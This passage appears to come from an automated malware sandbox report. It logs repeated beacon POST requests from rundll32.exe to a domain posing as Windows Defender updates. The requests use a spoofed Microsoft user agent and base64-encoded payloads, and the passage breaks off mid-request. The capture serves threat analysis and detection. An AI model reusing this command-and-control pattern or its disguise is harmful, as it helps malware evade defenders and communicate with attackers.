                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:58.056699038 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:57 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            14192.168.2.549786185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:58.452136993 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:59.885176897 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:59 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            15192.168.2.549787185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:00.150755882 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:01.598551035 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:01 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            16192.168.2.549789185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:01.886512995 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:03.330734015 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:02 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            17192.168.2.549790185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:03.663961887 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:05.261639118 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:04 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            18192.168.2.549791185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:05.527555943 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:06.976794004 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:06 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            19192.168.2.549792185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:07.241880894 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:08.678684950 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:08 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            20192.168.2.549793185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:08.944052935 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:10.389496088 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:10 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            21192.168.2.549794185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:10.663183928 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:12.145798922 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:11 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            22192.168.2.549796185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:12.414484978 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:13.873713017 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:13 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            23192.168.2.549797185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:14.133641958 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:15.569931984 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:15 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            24192.168.2.549798185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:15.960436106 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:12:17.400242090 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:12:17 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            25192.168.2.549799185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:12:17.663589001 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
